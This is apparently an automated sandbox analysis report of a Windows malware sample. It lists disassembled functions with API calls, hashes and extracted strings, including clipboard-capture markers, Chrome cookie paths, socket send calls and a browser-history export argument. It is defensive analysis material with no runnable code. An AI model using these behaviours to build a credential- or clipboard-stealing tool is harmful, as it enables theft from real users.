                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                    • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                    • _free.LIBCMT ref: 10005BB4
                                                                    • _free.LIBCMT ref: 10005BDB
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                    • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                    • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                    • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseHandleOpen$FileImageName
                                                                    • String ID:
                                                                    • API String ID: 2951400881-0
                                                                    • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                                    • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                    • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                    • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat
                                                                    • String ID:
                                                                    • API String ID: 493641738-0
                                                                    • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                    • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                    • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                    • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                    APIs
                                                                    • _free.LIBCMT ref: 004509D4
                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                    • _free.LIBCMT ref: 004509E6
                                                                    • _free.LIBCMT ref: 004509F8
                                                                    • _free.LIBCMT ref: 00450A0A
                                                                    • _free.LIBCMT ref: 00450A1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                    APIs
                                                                    • _free.LIBCMT ref: 100091D0
                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                    • _free.LIBCMT ref: 100091E2
                                                                    • _free.LIBCMT ref: 100091F4
                                                                    • _free.LIBCMT ref: 10009206
                                                                    • _free.LIBCMT ref: 10009218
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                    • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                    • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                    • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00444066
                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                    • _free.LIBCMT ref: 00444078
                                                                    • _free.LIBCMT ref: 0044408B
                                                                    • _free.LIBCMT ref: 0044409C
                                                                    • _free.LIBCMT ref: 004440AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                    APIs
                                                                    • _strpbrk.LIBCMT ref: 0044E738
                                                                    • _free.LIBCMT ref: 0044E855
                                                                      • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                                                      • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                                      • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                    • String ID: *?$.
                                                                    • API String ID: 2812119850-3972193922
                                                                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                    • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                    • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                                    APIs
                                                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                                      • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,007521A8,00000010), ref: 004048E0
                                                                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                    • String ID: XQG$NG$PG
                                                                    • API String ID: 1634807452-3565412412
                                                                    • Opcode ID: 066ab0f2be03c135ffd6037bebe1ac0449cd68d92e7d767799085490893cd634
                                                                    • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                                    • Opcode Fuzzy Hash: 066ab0f2be03c135ffd6037bebe1ac0449cd68d92e7d767799085490893cd634
                                                                    • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: `#D$`#D
                                                                    • API String ID: 885266447-2450397995
                                                                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe,00000104), ref: 10004C1D
                                                                    • _free.LIBCMT ref: 10004CE8
                                                                    • _free.LIBCMT ref: 10004CF2
                                                                    Strings
                                                                    • C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, xrefs: 10004C14, 10004C1B, 10004C4A, 10004C82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                    • API String ID: 2506810119-458039306
                                                                    • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                    • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                    • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                    • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                    • String ID: /sort "Visit Time" /stext "$0NG
                                                                    • API String ID: 368326130-3219657780
                                                                    • Opcode ID: 94819857908d116ca8b212f346f2b464162ef9006d713e6b6969961f93c7f3c7
                                                                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                    • Opcode Fuzzy Hash: 94819857908d116ca8b212f346f2b464162ef9006d713e6b6969961f93c7f3c7
                                                                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                    APIs
                                                                      • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                      • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                      • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                      • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                      • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                      • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                      • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                    • _free.LIBCMT ref: 10006CD7
                                                                    • _free.LIBCMT ref: 10006D0D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorLast_abort
                                                                    • String ID: {x${x
                                                                    • API String ID: 2991157371-454721515
                                                                    • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                    • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                    • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                    • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                    APIs
                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Init_thread_footer__onexit
                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]$hdF
                                                                    • API String ID: 1881088180-1379921833
                                                                    • Opcode ID: 3fb8de787f6fc93254c5a32beaddbaead1d4d9a81c48a58c68f8249c05d0bce9
                                                                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                    • Opcode Fuzzy Hash: 3fb8de787f6fc93254c5a32beaddbaead1d4d9a81c48a58c68f8249c05d0bce9
                                                                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 004162F5
                                                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                      • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wcslen$CloseCreateValue
                                                                    • String ID: !D@$okmode$PG
                                                                    • API String ID: 3411444782-3370592832
                                                                    • Opcode ID: 00dd2ff1ceeeda7d33060455399664933c09588d7f10a894b47937f8b27e4c6d
                                                                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                    • Opcode Fuzzy Hash: 00dd2ff1ceeeda7d33060455399664933c09588d7f10a894b47937f8b27e4c6d
                                                                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                    APIs
                                                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                                    Strings
                                                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
